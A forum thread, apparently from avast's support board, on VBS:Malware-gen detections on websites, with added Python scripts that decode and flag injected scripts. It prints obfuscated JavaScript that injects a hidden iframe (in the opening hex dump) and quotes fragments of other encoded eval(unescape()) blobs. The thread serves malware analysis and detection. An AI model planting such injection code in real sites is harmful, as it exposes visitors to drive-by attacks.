0190  38 36 25 45 42 25 45 41 25 45 31 25 46 32 25 46   86%EB%EA%E1%F2%F
01a0  44 25 41 35 25 42 38 25 45 43 25 46 31 25 45 42   D%A5%B8%EC%F1%EB
01b0  25 46 31 25 46 38 25 46 31 25 46 32 25 46 31 25   %F1%F8%F1%F2%F1%
01c0  45 41 25 45 31 25 41 30 25 46 45 25 46 31 25 46   EA%E1%A0%FE%F1%F
01d0  41 25 46 41 25 46 44 25 46 34 25 42 38 25 41 34   A%FA%FD%F4%B8%A4
01e0  25 41 32 25 46 31 25 46 43 25 45 38 25 46 39 25   %A2%F1%FC%E8%F9%
01f0  46 35 25 46 44 25 38 36 25 45 42 25 45 38 25 46   F5%FD%86%EB%E8%F
0200  42 25 41 35 25 42 38 25 46 45 25 45 41 25 45 41   B%A5%B8%FE%EA%EA
0210  25 46 36 25 41 30 25 42 37 25 42 37 25 45 41 25   %F6%A0%B7%B7%EA%
0220  46 31 25 46 36 25 46 37 25 46 42 25 46 34 25 45   F1%F6%F7%FB%F4%E
0230  41 25 42 34 25 46 42 25 46 37 25 46 35 25 42 37   A%B4%FB%F7%F5%B7
0240  25 46 32 25 46 41 25 42 37 25 46 35 25 46 44 25   %F2%FA%B7%F5%FD%
0250  46 34 25 45 41 25 42 37 25 42 38 25 38 36 25 45   F4%EA%B7%B8%86%E
0260  46 25 46 31 25 46 41 25 45 41 25 46 45 25 41 35   F%F1%FA%EA%FE%A5
0270  25 41 39 25 38 36 25 46 45 25 46 44 25 46 31 25   %A9%86%FE%FD%F1%
0280  46 46 25 46 45 25 45 41 25 41 35 25 41 39 25 41   FF%FE%EA%A5%A9%A
0290  34 25 41 32 25 42 37 25 46 31 25 46 43 25 45 38   4%A2%B7%F1%FC%E8
02a0  25 46 39 25 46 35 25 46 44 25 41 34 25 41 32 25   %F9%F5%FD%A4%A2%
02b0  42 37 25 46 41 25 46 31 25 45 43 25 41 34 22 3b   B7%FA%F1%EC%A4";
02c0  73 74 72 3d 74 6d 70 3d 27 27 3b 66 6f 72 28 69   str=tmp='';for(i
02d0  3d 30 3b 69 3c 73 74 72 31 2e 6c 65 6e 67 74 68   =0;i<str1.length
02e0  3b 69 2b 3d 33 29 7b 74 6d 70 20 3d 20 75 6e 65   ;i+=3){tmp = une
02f0  73 63 61 70 65 28 73 74 72 31 2e 73 6c 69 63 65   scape(str1.slice
0300  28 69 2c 69 2b 33 29 29 3b 73 74 72 3d 73 74 72   (i,i+3));str=str
0310  2b 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72   +String.fromChar
0320  43 6f 64 65 28 28 74 6d 70 2e 63 68 61 72 43 6f   Code((tmp.charCo
0330  64 65 41 74 28 30 29 5e 65 29 2d 31 32 37 29 3b   deAt(0)^e)-127);
0340  7d 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28   }document.write(
0350  73 74 72 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d   str);</script>..
0360  0a 30 0d 0a 0d 0a                                 .0....
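
As an added example (mine, not code from the thread or from avast), here is a small Python analysis script for exactly the capture above: it reconstructs the response from the dump (headers copied verbatim, the chunked body re-assembled from the hex), de-chunks it, and then statically reverses the script's own XOR-and-offset scheme instead of executing any JavaScript. The HTTP parsing is generic; the decoder is specific to the `e`/`str1`/`-127` idiom visible in the dump. The function names (`split_response`, `dechunk`, `decode_xor_script`, `analyse`) are mine.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: the 302 response reconstructed from the packet dump
# above. Headers are copied verbatim; the body is re-assembled as a single
# chunk (the original chunk length 0x215 is recomputed from the payload).
HEADERS = (
    b"HTTP/1.1 302 Found\r\n"
    b"Date: Thu, 21 Feb 2008 21:23:34 GMT\r\n"
    b"Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8e mod_perl/2.0.2 Perl/v5.8.8\r\n"
    b"X-Powered-By: PHP/5.2.0-8+etch9\r\n"
    b"Location: news.php\r\n"
    b"Connection: close\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)

OBFUSCATED_SCRIPT = (
    "<script language=\"JavaScript\">e = '0x00' + '19';"
    'str1 = "%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1%A0'
    "%FE%F1%FA%FA%FD%F4%B8%A4%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8%FE%EA%EA%F6"
    "%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7%F5%B7%F2%FA%B7%F5%FD%F4%EA%B7%B8%86"
    "%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5%A9%A4%A2%B7%F1%FC%E8%F9%F5%FD"
    '%A4%A2%B7%FA%F1%EC%A4";'
    "str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));"
    "str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);"
    "</script>"
)


def chunked(payload: bytes) -> bytes:
    """Encode payload as one HTTP/1.1 chunk followed by the terminating 0-chunk."""
    return b"%x\r\n" % len(payload) + payload + b"\r\n0\r\n\r\n"


SAMPLE_RESPONSE = HEADERS + chunked(b"\n" + OBFUSCATED_SCRIPT.encode("ascii") + b"\n")


def dechunk(data: bytes) -> bytes:
    """Reassemble a chunked transfer-coding body; raises ValueError if truncated."""
    out, pos = bytearray(), 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)  # drop chunk extensions
        if size == 0:
            return bytes(out)
        out += data[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                       # skip data and its CRLF


def split_response(raw: bytes):
    """Return (status, headers, body) for a raw HTTP/1.1 response, de-chunking
    the body when the server declared Transfer-Encoding: chunked."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return status, headers, body


# Matches the exact idiom in the dump: a key assembled from two string halves
# and a payload of %XX escapes, later XORed with the key and shifted by 127.
XOR_SCRIPT_RE = re.compile(
    r"e = '(?P<hi>0x[0-9A-Fa-f]*)' \+ '(?P<lo>[0-9A-Fa-f]+)';"
    r'str1 = "(?P<blob>(?:%[0-9A-Fa-f]{2})+)"'
)


def decode_xor_script(html: str):
    """Statically undo the loop String.fromCharCode((c ^ e) - 127) without
    running any JavaScript. Returns None if the idiom is not present."""
    m = XOR_SCRIPT_RE.search(html)
    if m is None:
        return None
    key = int(m.group("hi") + m.group("lo"), 16)      # JS coerces '0x0019' to 25
    raw = unquote_to_bytes(m.group("blob"))           # what unescape() yields per %XX
    return "".join(chr((b ^ key) - 127) for b in raw)


def analyse(raw: bytes) -> dict:
    """Summarise a captured response: status, redirect target, whether a body
    rode along with the redirect, and what the obfuscated script hides."""
    status, headers, body = split_response(raw)
    html = body.decode("latin-1")
    return {
        "status": status,
        "location": headers.get("location"),
        "has_body": len(body.strip()) > 0,
        "decoded": decode_xor_script(html),
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_RESPONSE).items():
        print(f"{key}: {value}")
```

Running it shows the point of the post: the redirect to `news.php` carries a 533-byte chunked body whose decoded content is a `visibility:hidden` div wrapping a 1x1 iframe to the tipocnt.com host named earlier in the thread. A scanner that follows the `Location` header and ignores the body of a 3xx response never sees it, which is consistent with the other products reporting the site clean.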

Title: Re: VBS:Malware-gen
Post by: Dig on February 22, 2008, 12:49:43 AM
Neat trick huh?

Ok, I've removed that malicious code and notified my host to check security at their end.  Could you confirm that the site is now clean please?

I assume that all other virus scans were showing clean as the code is never executed (at least not by firefox) due to the redirect header?  How much of a risk is this type of exploit if browsers ignore the content?

Cheers,
Nick
Title: Re: VBS:Malware-gen
Post by: kubecj on February 22, 2008, 12:59:18 AM
Depends on the point of view.

From the user's view - if the browser won't execute it (I don't know and I can't google anything reasonable), nothing happens, the code is just stored in the user's cache.

From the webmaster's view - something is very wrong regarding the security and this may be just one of the 'bad things' sitting quietly on the server.


Right now avast! does not report anything on load. NOD32 and Dr.Web did not report anything just because they won't catch it at all. See the VirusTotal report - both consider the piece as 'ok'.
Title: Re: VBS:Malware-gen
Post by: MrChuck on April 08, 2008, 02:21:23 AM
I am seeing VBS Malware-gen warnings against the site www.australianolives.com.au. Is it possible to work out whether this is a false positive or an actual malware? The webmaster believes her site is OK; we are using Avast Enterprise with the latest updates (but I've seen the same warning at home with the free edition), and I see from the discussion above that some of these are false positives and some are not. Our local machines are not infected according to avast.

This issue seems pretty tricky!

MrChuck
Title: Re: VBS:Malware-gen
Post by: kubecj on April 08, 2008, 09:38:23 AM
It does reference an encrypted hidden iframe pointing to stat-google.com. We definitely don't like that  8)
Title: Re: VBS:Malware-gen
Post by: DavidR on April 08, 2008, 02:35:47 PM
stat-google.com is registered to Google Inc.; perhaps something similar to google-analytics.com?
Title: Re: VBS:Malware-gen
Post by: blackcat2 on April 08, 2008, 04:20:29 PM
I just started noticing incessant warnings for this after the update on several scripts I have on my computer for my websites.
I know there is no malware on them at all so what in the code could possibly be triggering all these warnings?

One of the scripts is something I put together to allow editing of a website template online by the person who downloaded it. It is quite simple really. Nothing malware about it.

It uses javascript and a form combined with a variable(section) to be replaced when the user presses submit. Could it be something in the javascript that is triggering this?

Heidi
Title: Re: VBS:Malware-gen
Post by: kubecj on April 08, 2008, 04:25:14 PM
Maybe. The best you can do is to send us the samples to virus@avast.com, stating that it's a false alarm and also with which VPS version you got which detection.
Title: Re: VBS:Malware-gen
Post by: MrChuck on April 09, 2008, 02:15:12 AM
OK, I'm not much the wiser. Is encrypting a hidden iframe something google is likely to do? If so, why are they using hacker technology for 'legitimate' statistics collection?

So the question still is: should avast be reporting this as a threat or not, and what do I tell the australian olives webmaster?

MrChuck
Title: Re: VBS:Malware-gen
Post by: kubecj on April 09, 2008, 09:17:08 AM
Does she know there is such stuff on her site?
Is stat-google.com really 'legitimate' google site used for tracking purposes? (I don't question the ownership, but that may be bought later)
Why is this stuff hidden in a special file, does document.write and is obfuscated?

To me it definitely looks fishy.
Title: Re: VBS:Malware-gen
Post by: MrChuck on April 11, 2008, 06:16:56 AM
Thanks to all, I have passed this information on to the webmaster at Australia Olives.
Title: Re: VBS:Malware-gen
Post by: MrChuck on April 11, 2008, 07:28:41 AM
Here is the webmaster's comment--interesting!

'I did at one stage install a Google Adsense module on the site. stat-google.com is referenced in that file.
I subsequently removed the google ads, but the script that Google gave me is still on the site. It's used for counting the number of 'click-throughs' that are made from a Google ad to the advertiser's home page, so that Google can pay commissions. I'm sure it won't hurt you, but I will take it off the site since we're not using it anyway.
In the meantime, I did also find a folder full of images that i didn't put there, and which I'm getting our service provider to look into as well.'

So is google adsense a worm? :-)

MrChuck
Title: Re: VBS:Malware-gen
Post by: kubecj on April 11, 2008, 09:03:14 AM
I'll ask Paranoia Inc. subsidiary in my neighborhood  ;D ;D

Problem is we're mostly getting 'how' it's done. And doing that encrypted in an external file looked simply suspicious (it does not matter which site it contacts).
Title: Re: VBS:Malware-gen
Post by: designsbywinter on April 13, 2008, 11:28:43 PM
I have this similar problem in a Plugin that is made for Cash Crusader GPT script software.

I am getting the warning to abort connection because the file emailidlist.php has the virus VBS: malware-gen

Is there a way for me to submit the zip file so you guys can put it on your white list or something? This is a highly sold plugin and I do not need that warning popping up for customers to think they are buying an infected product.

Thanks in advance for your help!  :)

Winter Perkins
www.designsbywinter.info
www.seamlesswebsolutions.com
Title: Re: VBS:Malware-gen
Post by: Lisandro on April 13, 2008, 11:43:54 PM
Is there a way for me to submit the zip file so you guys can put it on your white list or something?
You send the samples to virus@avast.com ?
You can zip and password-protect the files... Include a link to this thread and the password used.
Or you can send the files to Chest and, from there, resend to Alwil for analysis.
Thanks.

As a workaround, if you think and are sure it's a false positive, you can add these files to the Standard Shield provider (on-access scanning) exclusion list.
Left click the 'a' blue icon, click on the provider icon at left and then Customize. Go to Advanced tab and click on Add button...
You can use wildcards like * and ?. But be careful: you shouldn't 'exclude' so many files that your system is left in danger.
You can add the url to WebShield exclusion list also.
Title: Re: VBS:Malware-gen
Post by: kubecj on April 13, 2008, 11:50:20 PM
False alarm, fixed in the internal build.
Title: Re: VBS:Malware-gen
Post by: Lisandro on April 13, 2008, 11:57:31 PM
False alarm, fixed in the internal build.
Thanks for the quick response. Hey... today is Sunday ;D
Title: Re: VBS:Malware-gen
Post by: kubecj on April 14, 2008, 12:01:33 AM
Monday here already  ;D 8)
Title: Re: VBS:Malware-gen
Post by: Lisandro on April 14, 2008, 12:02:29 AM
Monday here already  ;D 8)
Wow... worse... it's late in the evening... children must be at their bed ;D
Title: Re: VBS:Malware-gen
Post by: Smoovious on April 26, 2008, 02:48:04 PM
I have to add another site that may be giving a false positive.

hxxp://absolute-bikini.com/ (and hxxp://absolute-bikini.com/)

Also, once I block the malware from the page, I find I can't even attempt to bring up the page again.

Is there something in avast that is preventing it? I was going to try and find out what was in the page source but can't do that now.

I haven't found anywhere where the site is blacklisted yet, still looking tho.

-- Smoovious
Title: Re: VBS:Malware-gen
Post by: kubecj on April 26, 2008, 02:59:52 PM
Indeed a false alarm. Removed from the internal build, will be fixed in next public vps update.
Title: Re: VBS:Malware-gen
Post by: Smoovious on April 26, 2008, 03:37:59 PM
but what about not being able to bring up the site again? can I reset that right?

--Smoovious
Title: Re: VBS:Malware-gen
Post by: DavidR on April 26, 2008, 03:47:45 PM
You could temporarily add the domain to the Web Shield, Customize, Exceptions tab, URLs to exclude. That however would leave a large hole in the web shield security.

If you can do without your bikini fix for a short time, then the next VPS update shouldn't be too long.
Title: Re: VBS:Malware-gen
Post by: Smoovious on April 26, 2008, 03:56:50 PM
hahahaha. :) I don't need it now, no... just wanted to make sure that it wasn't going to be persistent after the next VPS update. :D

-- Smoovious
Title: Re: VBS:Malware-gen
Post by: SOURAV on April 28, 2008, 05:04:35 PM
I am new in this forum. I've been using avast Home Edition for the last year. The problem I'm facing is whenever I plug a USB drive into the PC and double-click to open it, it takes some time to open, then my avast continuously shows a "virus has been detected" message: c:\windows\system32\BV:malware gen, followed by a message box "Windows Script Host: can not find script file c:\documents and settings\Administrator\boot.vbs". When I click OK to terminate it, it reappears again and again; I could not stop it. If I reboot it also appears again. Please help me.  [I scan every time I plug in the USB]

Is there any antispyware, antimalware or antivirus program that I need to run in order to save myself from viruses and worms?

Please reply.

Thanks.
Title: Re: VBS:Malware-gen
Post by: reodis on June 23, 2008, 03:06:03 AM
Seems no one has had this problem for a while. I installed Avast! on a friend's system a while ago and she called me up today to say that she got this message when she went to the yahoo main page. I assured her it was a mistake but to make sure, I told her to scan her whole computer. She did and came up with no viri or malware. I advised her to try to go to other websites. She successfully went to 5 or 6. She even went to other Yahoo! websites. It was just when she typed in "http://www.yahoo.com/" that she got the warning and the option to "Abort Connection". Just because I was curious, I did it myself. I too got the message that a "virus" was found when I went to the site. It's funny that the URL showing is "http://www.yahoo.com/" but the Avast Warning indicates "http://www.yahoo.com/\unp34785754". Fooling around, I find the numbers at the end change every time I connect to this page. I believe I have the latest VPS version (080622-0, 06/22/2008) even though previous posts on this thread indicate it was a False-Positive and would be fixed in the next VPS version - and that was months ago.

The reason this is important is because this friend knows just about enough about computers to ask the most stupid questions (a la, "What kind of bait do I use to get rid of that mouse pointer?") You know, you've met computer users like that. It took 20 minutes to get her off the phone after I showed her how to do a scan. She has a 250GB drive and wanted to stay on the phone until it was done. This is even though I told her what to expect if she FOUND a virus/malware and told her to call me back if that happened.  Anyway, I'm stuck with her for another 11 months (contractual phone/home technical AND hardware support), but she's driving me nuts. ???
Title: Re: VBS:Malware-gen
Post by: Casper34 on June 23, 2008, 03:23:55 AM
I got the same msg too. First it was on my dad's comp. I looked to see what VPS he was running, it is 080622-0. I was running the next older one, I went to www.yahoo.com (http://www.yahoo.com) with no problems. Then I did a manual update, went to yahoo and got the msg.     file name: http://www.yahoo.com/\unp150501928    This only happens when you type the URL in or click on a link. I can access my mail through YahooIM with no problems.  BTW we are both running Avast 4.8 Pro.



:EDIT:  as soon as i posted this, there was an update. 080623-0     seems to have fixed yahoo.  :EDIT:
Title: Re: VBS:Malware-gen
Post by: arecus on July 13, 2008, 10:24:40 AM
I run two websites, www.labki.pl and www.laboteka.pl, and receive many messages from the Avast users about bugs found. Other users have no problems, could you please check the sites?
Title: Re: VBS:Malware-gen
Post by: kubecj on July 13, 2008, 10:52:16 AM
Do you know what is the purpose of the huge encrypted javascript stuff at the end of the frontpage?
Title: Re: VBS:Malware-gen
Post by: arecus on July 13, 2008, 11:15:16 AM
As I'm not very experienced I'm not sure what you are asking about. There should be typical elements for Joomla only and additionally Google Analytics, nothing more.
Title: Re: VBS:Malware-gen
Post by: kubecj on July 13, 2008, 11:22:58 AM
After the analytics, there is one line with obfuscated and encoded javascript, about 6KB long. Highly suspicious, and you don't know what it is about?
Title: Re: VBS:Malware-gen
Post by: arecus on July 13, 2008, 11:34:45 AM
There is nothing I know about. Analytics is added to the HTML of the template and there, it looks, is nothing more than required, no unexpected scripts after it.
Title: Re: VBS:Malware-gen
Post by: kubecj on July 13, 2008, 11:41:01 AM
Load the homepage and then inspect the source code...

<script language="javascript">$="%64b%3d%22%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%
Title: Re: VBS:Malware-gen
Post by: zoomphoto on July 13, 2008, 11:31:08 PM
Any idea what could be causing this warning on my site: www . zoomphoto . ca

it was reported by a user today.

The site is custom coded... not an off the shelf software package.

Thanks,
Title: Re: VBS:Malware-gen
Post by: kubecj on July 13, 2008, 11:34:18 PM
The very same thing as for the user before you. There is something huge and encrypted at the end of the homepage, after the Google Analytics. Do you have any idea what it may be?
Title: Re: VBS:Malware-gen
Post by: zoomphoto on July 14, 2008, 12:11:04 AM
No clue!  I just removed it... time to change the root pw on the box!
Title: Re: VBS:Malware-gen
Post by: DavidR on July 14, 2008, 12:59:36 AM
You might want to report this to your host, as I doubt that your site was alone: if they can do it to you, they in theory could and would do it to other hosted sites.
Title: Re: VBS:Malware-gen
Post by: zoomphoto on July 14, 2008, 01:02:09 AM
I am my own host, and own my own servers... I've already changed root... now it's just searching through logs... yay!

It was phpfake that I was hit with... or so the function was named.
Title: Re: VBS:Malware-gen
Post by: visionex on July 22, 2008, 12:09:23 PM
Hi,

I have some members on my website who have the same problem on this site: hxxp://www.internetdvd.org
"Nom du fichier : hxxp://internetdvd.org/
Nom du logiciel malveillant : VBS:Malware-gen
Type de logiciel malveillant : Virus/Ver"

I have Kaspersky and I have no problem.

Thanks for looking at and correcting the problem.

PS : Sorry for my english, i'm french ^^'
Title: Re: VBS:Malware-gen
Post by: DavidR on July 22, 2008, 02:38:49 PM
Your English is fine.

I wasn't able to get a look at the page source (using FF 3.0.1) as it didn't display, just displays a blank page, so if this is a measure to protect against stealing content, it also stops checking.

There is an auto redirect to display hxxp://internetdvd.org/catalog.php, so I couldn't see if the problem is at hxxp://internetdvd.org/ or the catalog.php page. PHP is vulnerable to hacking, so I don't know if you have checked your pages for unknown code.

I have reported it as a possible false positive, but I don't know if they won't hit the same problem I did.
Title: Re: VBS:Malware-gen
Post by: kubecj on July 22, 2008, 05:33:52 PM
visionex, check your security, you've been hacked. Check your index, there is some huge dirty encrypted thing after the Analytics code. You may also want to search for 'phpfake' in your sourcecode.
Title: Re: VBS:Malware-gen
Post by: krubach on July 23, 2008, 12:11:47 PM
Hello guys,

I have several members of my website that use Avast! reporting me that Avast warns about VBS:Malware-gen trojan on my frontpage.
The url is http://f1portugal.com .
AFAIK there is no suspicious code in the frontpage, but maybe Avast is suspecting the DHTML code i put there.

Please let me know if it is clean, so i can assure people it's safe.

TIA
Title: Re: VBS:Malware-gen
Post by: kubecj on July 23, 2008, 12:16:32 PM
Sorry, it's not. We're getting a script, most probably in the redirection?

Code: [Select]
<script language=JavaScript>var kco=" shapgvba hmdvx(oz){ine fz,we=\"{v^abR

Title: Re: VBS:Malware-gen
Post by: krubach on July 23, 2008, 12:19:37 PM
Ok. Thank you very much for helping me. I'll check that out. ;)
Title: Re: VBS:Malware-gen
Post by: jimjams88 on July 23, 2008, 01:56:23 PM
I am getting an Avast VBS:malware warning for our site http://www.tangira.com.

My VPS is 080723-0 (programme build 4.8.1227).

Can you please advise?

Thanks!
Title: Re: VBS:Malware-gen
Post by: kubecj on July 23, 2008, 01:59:55 PM
Do you know what is the encrypted stuff at the end of your webpage, after the analytics code?
Title: Re: VBS:Malware-gen
Post by: krubach on July 23, 2008, 03:09:22 PM
Sorry, it's not. We're getting a script, most probably in the redirection?

Code: [Select]
<script language=JavaScript>var kco=" shapgvba hmdvx(oz){ine fz,we=\"{v^abR

Thank you very much for pointing me in the right direction kubecj. ;)
Problem solved now.
Title: Re: VBS:Malware-gen
Post by: jimjams88 on July 23, 2008, 03:59:46 PM
Kubecj - I don't, as I didn't design the site. There has never been a problem accessing it before though. I can check with the designers if you think it's suspicious. Is there any way to tell (given it's encrypted)?
Title: Re: VBS:Malware-gen
Post by: kubecj on July 23, 2008, 04:36:00 PM
Basically it's an encrypted iframe pointing to 202.164.52.199. That's a site somewhere in India.
Title: Re: VBS:Malware-gen
Post by: Vlk on July 23, 2008, 04:48:37 PM
Basically it's an encrypted iframe pointing to 202.164.52.199. That's a site somewhere in India.

In other words, _most_likely_ a code injection that you were unaware of...
Title: Re: VBS:Malware-gen
Post by: jimjams88 on July 23, 2008, 04:58:06 PM
OK - thanks a lot for the advice. I have deleted the offending code and the site loads fine now. (also changed the CMS panel passwords!)
Title: Re: VBS:Malware-gen
Post by: visionex on July 24, 2008, 02:07:15 PM
visionex, check your security, you've been hacked. Check your index, there is some huge dirty encrypted thing after the Analytics code. You may also want to search for 'phpfake' in your sourcecode.
http://www.internetdvd.org isn't my site ^^
I just don't understand why BitDefender, Kaspersky and other antiviruses detect no virus except Avast ::)
Title: Re: VBS:Malware-gen
Post by: kubecj on July 24, 2008, 02:12:17 PM
Right now it's clean, that's why they don't detect anything now. OTOH, our script malware detection is quite good, I'd say.
Title: Re: VBS:Malware-gen
Post by: Lisandro on July 24, 2008, 03:07:45 PM
OTOH, our script malware detection is quite good, I'd say.
Congratulations. Keep your good work.
Title: Re: VBS:Malware-gen
Post by: decadechild on July 26, 2008, 01:36:59 AM
I have a forum showing up the same Virus/Worm.
hxxp://www.syaoregon.us/forum

The url that Avast! shows is:
Code: [Select]
http://www.syaoregon.us/forum/\unp263177177
VPS version: 080725-1, 07/25/2008

It's an outdated SMF forum. All links to it show up infected. This is just too weird.
All other sites & SMF forums work fine for me. ???
Title: Re: VBS:Malware-gen
Post by: DavidR on July 26, 2008, 02:08:31 AM
This forum is also SMF and some time ago there was a code injection attack, so I wouldn't be surprised if 'all links showed up as infected', especially if the SMF software is also old.

If the site is hacked then all the pages are likely to have had code placed on them

The URL that avast shows includes the extracted file that was scanned, the \unp263177177 at the end. So the infection is on the main forum page.

There is a 'Hacked by Tqrl' in the page title, so it would appear my assumption of it being hacked is correct and all links are likely to have been injected with code. If you are the webmaster or know the webmaster then you should let him know, if he doesn't already, that his site has been hacked.

Please modify your post so the link isn't active, e.g. hXXp://www.syaoregon.us/forum replace the tt with XX as in the example.
Title: Re: VBS:Malware-gen
Post by: decadechild on July 26, 2008, 03:50:47 AM
Wow. That's weird. Who would hack an inactive forum from an organization? :-\

Sorry, fixed link.

Thanks. I couldn't even see the "Hacked by Tqrl" page title.
Title: Re: VBS:Malware-gen
Post by: DavidR on July 26, 2008, 01:57:54 PM
No problem, glad I could help.

People or bots don't know it is inactive; they are just seeking out vulnerabilities and exploiting them when found.

Welcome to the forums.
Title: Re: VBS:Malware-gen
Post by: Vlk on July 28, 2008, 11:36:57 AM
Wow. That's weird. Who would hack an inactive forum from an organization? :-\

It is not manual work anymore. Hackers create crawlers that proactively look for compromisable sites (such as those running outdated/vulnerable PHP-based forums) and inject the shyte automatically... it doesn't really matter if the forum is "inactive" or not...

Cheers
Vlk
Title: Re: VBS:Malware-gen
Post by: Grey on August 05, 2008, 10:29:35 PM
Hey, when opening www.metal-forever.eu I'm getting malware http://www.metal-forever.eu/forum/clientscript/vbulletin_menu.js?v=368 and aborting connection. What's up with it? Did the site have a real virus or is it another misunderstanding?
Sorry for my language
Regards Grey
Title: Re: VBS:Malware-gen
Post by: kubecj on August 05, 2008, 10:35:55 PM
Really infected. See the top of the page, massive js encrypted stuff.
Title: Re: VBS:Malware-gen
Post by: Q.Lady on August 23, 2008, 12:22:06 PM
I have this VBS thing in my 3 flash disks. I tried everything like moving the infected autorun file to the chest then deleting it manually or using a Turkish virus detector named Dracula but my problem persisted and recurred every time. I've just used Flash Disinfector and I haven't received any alert from Avast but when I opened my flash disks I saw a blank autorun file made by Flash Disinfector. I formatted one of my flash disks and the problem recurred again. Is Flash Disinfector a temporary solution? What do I need to do to protect my flash disks from this VBS threat?

Thanks in advance.
Title: Re: VBS:Malware-gen
Post by: wyrmrider on August 23, 2008, 08:16:51 PM
Q
please start your own thread - call it Flash Disinfector or something Topical

run a Malwarebytes Anti-Malware free scan - click REMOVE, post the log
which virus do you have?
With avast- leave the hits in the Chest

do not delete flash disinfector or the file it creates- it's put there for your protection

do not post back here
Title: Re: VBS:Malware-gen
Post by: lukosanthropos on September 02, 2008, 10:07:09 PM
I've got one that needs checking, www.short-fiction.co.uk (logging in with a uname/pword creates the warning).
Title: Re: VBS:Malware-gen
Post by: wyrmrider on September 02, 2008, 10:26:18 PM
lukosanthropos
does your post have something to do with VBS:Malware-gen?
If yes continue  IF NOT start a new thread

You have one WHAT that needs checking?
Why? symptoms?
I tried that site and script block blocked two parts of it
Have you tried "site adviser" or similar?
Title: Re: VBS:Malware-gen
Post by: lukosanthropos on September 03, 2008, 01:10:34 AM
Yes it does. Going to that website I mentioned and trying to log in causes avast to show a VBS:Malware-gen error. My machine is not infected, I'm not that daft; one of my friends was asking me about it so I tested it in a VMware environment.
I posted this here as I had read the first few posts of this thread, where people highlighted websites which generated these errors from avast and let you know.

You have one WHAT that needs checking? - One website which I would like to know if they are trying to introduce malware (VBS:Malware-gen) to my machine or if this is a false alarm
Why? - Because I'm not going to use the site if it is
Symptoms? - None, I'm not stupid enough to get infected
Title: Re: VBS:Malware-gen
Post by: lukosanthropos on September 03, 2008, 01:12:25 AM
my vps version 080902-0 (forgot that bit sorry)
Title: Re: VBS:Malware-gen
Post by: wyrmrider on September 03, 2008, 05:22:05 AM
Thanks
I'd like to know too
perhaps one of the members with a sandbox can check out the site mentioned in post 143
Title: Re: VBS:Malware-gen
Post by: DavidR on September 03, 2008, 06:32:52 PM
It would be somewhat difficult to test as it requires you to log on.

So I just did it with a made up username and password and the page that is causing the grief is hxxp://www.short-fiction.co.uk/account/redirect.php, unfortunately I can't capture this redirect.php page to have a look at it.
Title: Re: VBS:Malware-gen
Post by: kubecj on September 03, 2008, 07:19:14 PM
As soon as you get the webshield warning, go to your temp directory; in the _avast4_ subdir you'll find the temporary files. You can copy them elsewhere and then let webshield delete them from the temp. One of the tempfiles would be that problematic page.
Title: Re: VBS:Malware-gen
Post by: wyrmrider on September 03, 2008, 07:24:59 PM
How about copying them to the user section of the chest and also uploading to VirusTotal?
It would be nice to see how dangerous these hits are

lukosanthropos
looks as if we are making some progress- you lurking?
Title: Re: VBS:Malware-gen
Post by: DavidR on September 03, 2008, 08:30:29 PM
As soon as you get the webshield warning, go to your temp directory; in the _avast4_ subdir you'll find the temporary files. You can copy them elsewhere and then let webshield delete them from the temp. One of the tempfiles would be that problematic page.

I tried what you suggested, even had the _avast_ sub directory open waiting, tried to logon and got the alert, left the alert window open and no unp files appear on the alert by avast, even refreshed folder but no files in that location.

Clicked the Abort connection to close the alert window and no unp files found, did a search for unp*.tmp and found two (unrelated to this, ashMaiSv.exe created these), both in the windows\temp\_avast4_ folder so it isn't using the folder avast created in C:\Documents and Settings\UserName\Local Settings\Temp\_avast4_ ???

So I'm out, can't capture even the unp files.

Edit, OK tried again and managed to capture the unp file, will send it for analysis as a possible FP.
Title: Re: VBS:Malware-gen
Post by: kubecj on September 03, 2008, 08:34:18 PM
Strange. While the dialogue is open, the file should be in temp\_avast4_. Where your temp is located depends on your settings.
Title: Re: VBS:Malware-gen
Post by: DavidR on September 03, 2008, 08:49:48 PM
For some reason there are two _avast4_ folders on my system, I was watching the wrong one first time out, watching the windows\temp\_avast4_ second time and was able to capture the file.

Update, uploaded the unp*.tmp file to VT and 7/36 detections (includes GData), see http://www.virustotal.com/analisis/54cbd22b1a6bbe88fd4de3c0822a914a (http://www.virustotal.com/analisis/54cbd22b1a6bbe88fd4de3c0822a914a)

There is a script tag that has what avast must think is suspect/malicious, see code below.

Code: [Select]
<script type="text/javascript">
eval(unescape("%64%6F[deleted]%29%3B"));
</script>
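
As an added example (mine, not code from the thread or from avast), here is a small Python triage script for the pattern kubecj keeps pointing at in this thread and for the two snippets quoted by kubecj and DavidR above: `eval(unescape(...))`, a `$="%64b%3d..."`-style percent-encoded blob, a `fromCharCode`/`charCodeAt`/`^` decoding loop, or a 1x1 or hidden iframe, flagged separately when the block sits after the Google Analytics snippet. The sample pages, the `UA-0000000-0` account id, the `example.invalid` host and the padding in the injected blob are constructed; the function names are mine.

```python
import re

# Constructed sample pages (not taken from any site in the thread). The
# injected block imitates the shape described above: a large percent-encoded
# blob, placed after the Google Analytics snippet, fed to eval(unescape()).
BENIGN_PAGE = """<html><body>
<h1>Welcome</h1>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">
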